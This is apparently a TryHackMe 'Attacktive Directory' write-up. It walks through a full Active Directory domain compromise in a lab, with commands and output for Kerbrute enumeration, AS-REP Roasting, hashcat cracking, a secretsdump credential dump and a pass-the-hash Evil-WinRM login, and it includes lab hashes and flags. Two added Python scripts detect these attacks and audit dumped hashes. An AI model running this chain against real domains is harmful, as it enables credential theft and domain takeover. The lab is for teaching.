TryHackMe – Attacktive Directory Write-up

Hi everyone! Today’s post is on the TryHackMe challenge Attacktive Directory, which introduces you to Kerberos user enumeration against a Domain Controller (DC) using Kerbrute, AS-REP Roasting of the DC using GetNPUsers, cracking Kerberos hashes with Hashcat, dumping password hashes from the DC, and using Evil-WinRM to access the DC. Let’s get started!

1. Deploy the machine

You can use Kali Linux, Parrot OS, or TryHackMe (THM)’s attack machine to attack the Domain Controller (DC).

2. Setup

Impacket installation

Impacket has always been difficult to install correctly; any missed step tends to result in a bunch of errors when running its tools. Thus, TryHackMe (THM) provides steps to install it correctly. If you are using THM’s attack machine, Impacket and BloodHound are already installed.

Firstly, we have to clone Impacket from the GitHub repository.

kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Next, we shall install the requirements.

kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

Finally, we can run the Python installation script.

kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

3. Welcome to Active Directory

We first use nmap to check which services are available on the Domain Controller (DC). In this simple lab setup, only the DC is available. In other Active Directory (AD) environments, we may have to enumerate and attack other workstations before we have a shot at accessing the DC.

kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST
Nmap scan report for 10.10.139.4
Host is up (0.36s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

We can also use enum4linux against ports 139/445 to enumerate NetBIOS for information such as existing usernames, the NetBIOS domain name, the domain SID, etc.

kali@kali~$ enum4linux 10.10.6.165
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.6.165
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.6.165   |
 =================================================== 
[E] Can't find workgroup/domain


 =========================================== 
|    Nbtstat Information for 10.10.6.165    |
 =========================================== 
Looking up status of 10.10.6.165
No reply from 10.10.6.165

 ==================================== 
|    Session Check on 10.10.6.165    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.139.4 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ========================================== 
|    Getting domain SID for 10.10.6.165    |
 ========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

...

Questions and answers

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

4. Enumerating Users via Kerberos

TryHackMe (THM) recommends using Kerbrute for this challenge to brute-force Kerberos (the key authentication service in Active Directory) and enumerate usernames and passwords. A modified username list and password list are provided. Note that brute-forcing credentials is not actually recommended in real environments because of account lockout policies.

Firstly, I downloaded Kerbrute onto my Kali machine and made it executable.

kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali~$ chmod +x kerbrute_linux_amd64

Next, I downloaded both the user list and password list.

kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

We can now check out the usage of the tool and use it on the Domain Controller (DC).

kali@kali~$ ./kerbrute_linux_amd64 --help
...
Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local.  userlist.txt
...
Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop

2022/01/11 22:53:06 >  Using KDC(s):
2022/01/11 22:53:06 >   10.10.6.165:88

2022/01/11 22:53:07 >  [+] VALID USERNAME:       james@spookysec.local.
2022/01/11 22:53:13 >  [+] VALID USERNAME:       svc-admin@spookysec.local.
2022/01/11 22:53:21 >  [+] VALID USERNAME:       James@spookysec.local.
2022/01/11 22:53:24 >  [+] VALID USERNAME:       robin@spookysec.local.
2022/01/11 22:53:54 >  [+] VALID USERNAME:       darkstar@spookysec.local.
2022/01/11 22:54:13 >  [+] VALID USERNAME:       administrator@spookysec.local.
2022/01/11 22:54:50 >  [+] VALID USERNAME:       backup@spookysec.local.
2022/01/11 22:55:08 >  [+] VALID USERNAME:       paradox@spookysec.local.

Questions and answers

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

svc-admin

What other notable account is discovered? (These should jump out at you)

backup

5. Abusing Kerberos

In this challenge, we can perform AS-REP Roasting because one or more user accounts do not require Kerberos pre-authentication before requesting a ticket. Thus, we can use Impacket’s /opt/impacket/examples/GetNPUsers.py to query AS-REP-roastable accounts from the Key Distribution Center (KDC). However, we need to provide a list of usernames; since we already enumerated valid usernames in the previous step, we can reuse them.

In my validusers.txt:

james
svc-admin
James
robin
darkstar
administrator
backup
paradox

Obtaining AS-REP-roastable accounts:

kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set

We can see that only svc-admin can request a ticket without providing its password: the KDC returns an AS-REP for it with no proof of the password, and part of that reply is encrypted with a key derived from the account’s password, which is what we can crack offline.

A quick Google search shows that hashcat mode 18200 is the one for this hash type.

kali@kali~$ hashcat -h | grep 18200
  18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols

Finally, we can attempt to crack svc-admin’s password using hashcat. I first stored the hash in hash.txt and then cracked it with the password list downloaded earlier.

kali@kali~$ cat hash.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566

kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005

It should only take a few seconds to crack the hash in a Kali virtual machine; on your Windows host it will be even faster. We obtain the password “management2005”.
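Seen from the defender’s side, both of the previous steps leave traces in the DC’s Security log: Kerbrute userenum produces a burst of Event 4768 failures with KDC_ERR_C_PRINCIPAL_UNKNOWN from one source, and GetNPUsers.py produces a successful 4768 with PreAuthType 0 and the RC4 etype. The detection logic below is an added example, not part of the original write-up or of any tool it uses; the event records, names and IP addresses are constructed, and only the relevant 4768 fields are modelled.

```python
"""Detection for the two Kerberos techniques used above: Kerbrute userenum
(a burst of AS-REQs for principals that do not exist) and AS-REP Roasting
(a TGT issued without pre-authentication, RC4 etype). Input is Windows
Security Event 4768 records reduced to the relevant fields; the sample
events and addresses are constructed for this example."""
from collections import defaultdict

# Event 4768 values as Windows logs them (hex strings):
#   Status 0x6: KDC_ERR_C_PRINCIPAL_UNKNOWN (user does not exist); 0x0: TGT issued
#   PreAuthType 0: no pre-authentication (UF_DONT_REQUIRE_PREAUTH)
#   TicketEncryptionType 0x17: RC4-HMAC, the etype 23 in $krb5asrep$23$...
STATUS_OK, STATUS_PRINCIPAL_UNKNOWN, ETYPE_RC4_HMAC = "0x0", "0x6", "0x17"


def ev(t, user, status, ip, preauth="-", etype="0xffffffff"):
    """Minimal Event 4768 record (t in seconds). Failed requests carry
    PreAuthType '-' and etype 0xffffffff, as Windows logs them."""
    return {"EventID": 4768, "Time": t, "TargetUserName": user, "Status": status,
            "IpAddress": ip, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample: 10.50.96.3 walks a wordlist (six unknown names in six
# seconds) and then requests a TGT for svc-admin without pre-auth. 10.50.96.9
# mistypes a name once and then logs on normally (PreAuthType 2 =
# PA-ENC-TIMESTAMP, etype 0x12 = AES256), which must not be flagged.
SAMPLE_EVENTS = [
    ev(100, "aaron", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(101, "abby", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(102, "adam", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(103, "adrian", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(104, "alex", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(105, "amy", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.3"),
    ev(110, "svc-admin", STATUS_OK, "10.50.96.3", preauth="0", etype=ETYPE_RC4_HMAC),
    ev(300, "jmaes", STATUS_PRINCIPAL_UNKNOWN, "10.50.96.9"),
    ev(305, "james", STATUS_OK, "10.50.96.9", preauth="2", etype="0x12"),
]


def detect_user_enumeration(events, threshold=5, window=60):
    """Sources with >= threshold unknown-principal failures inside any
    `window`-second span. Returns {ip: peak count in a window}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == STATUS_PRINCIPAL_UNKNOWN:
            by_ip[e["IpAddress"]].append(e["Time"])
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


def detect_asrep_roasting(events):
    """(user, ip) for each TGT issued without pre-auth using RC4: the exact
    request GetNPUsers.py makes, and an AS-REP that can be cracked offline."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["Status"] == STATUS_OK
            and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == ETYPE_RC4_HMAC]
```

The single mistyped name from 10.50.96.9 stays below the threshold, while the wordlist run and the pre-auth-less svc-admin request are both reported; the durable fix for the second finding is clearing “Do not require Kerberos preauthentication” on the account.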

Questions and answers

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5, etype 23, AS-REP

What mode is the hash?

18200

Now crack the hash with the modified password list provided, what is the user account’s password?

management2005

6. Back to the Basics

We can now attempt to enumerate SMB shared folders using our newly found credentials.

kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Going through each share, I found one that I could log in to, and it contains an interesting text file.

kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

I downloaded the text file and looked at its content.

smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

kali@kali~$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

It looks base64-encoded; decoding it reveals a valid credential.

kali@kali~$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860

Questions and answers

What utility can we use to map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

6

There is one particular share that we have access to that contains a text file. Which share is it?

backup

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

7. Elevating Privileges within the Domain

Obtaining the credentials of the backup account gives us more privileges on the Domain Controller (DC). This account has a permission that lets all Active Directory (AD) changes, including password hashes, be replicated to it. As a result, we can obtain every user’s password hash. To do so, we can use Impacket’s secretsdump.py.

kali@kali~$ python3 /opt/impacket/examples/secretsdump.py  spookysec.local/backup:backup2517860@10.10.6.165
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::

Finally, we install evil-winrm to access the system, since port 5985 (WinRM) is open.

kali@kali~$ sudo gem install evil-winrm
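The secretsdump output earlier in this section is also what a defender audits after a DC compromise or during a password-hygiene review. The script below is an added example, not part of the write-up or of Impacket: it parses the domain\uid:rid:lmhash:nthash::: lines (skipping the banner), groups accounts by NT hash to expose shared passwords, and flags accounts whose NT hash is that of the empty password. The sample is a subset of the dump above.

```python
"""Audit of a secretsdump.py NTDS dump in the format shown above
(domain\\user:rid:lmhash:nthash:::): which accounts share an NT hash (same
password) and which have the NT hash of the empty password. The sample
below is a subset of the dump above plus the banner lines the parser must skip."""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. no LM hash stored

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

SAMPLE_DUMP = r"""
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::
"""


def parse_dump(text):
    """Parse hash lines; banner and [*] status lines do not match and are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())  # domain is None for lines without one
    return records


def shared_nt_hashes(records):
    """{nt_hash: [users]} for every NT hash used by more than one account.
    Machine accounts (trailing $) are excluded; their passwords are random."""
    groups = defaultdict(list)
    for r in records:
        if not r["user"].endswith("$"):
            groups[r["nt"]].append(r["user"])
    return {h: users for h, users in groups.items() if len(users) > 1}


def empty_password_accounts(records):
    """Accounts whose NT hash is the hash of an empty password."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def lm_hash_stored(records):
    """Accounts that still have a real LM hash (should be none on a modern DC)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]
```

On the sample, Administrator and a-spooks share an NT hash, as do skidy and breakerofthings, so one cracked or replayed hash opens two accounts; Guest carries the empty-password hash, which is harmless only while the account stays disabled.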

Questions and answers

What method allowed us to dump NTDS.DIT?

DRSUAPI

What is the Administrator’s NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

pass the hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-H

8. Flag submission panel

Submit the flags for each user account. They can be found on each user’s desktop. We can simply log in as Administrator, which has access to the other users’ desktops.

kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

We can now access each user’s desktop to obtain their flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Questions and answers

svc-admin

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

TryHackMe{B4ckM3UpSc0tty!}

Administrator

TryHackMe{4ctiveD1rectoryM4st3r}

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
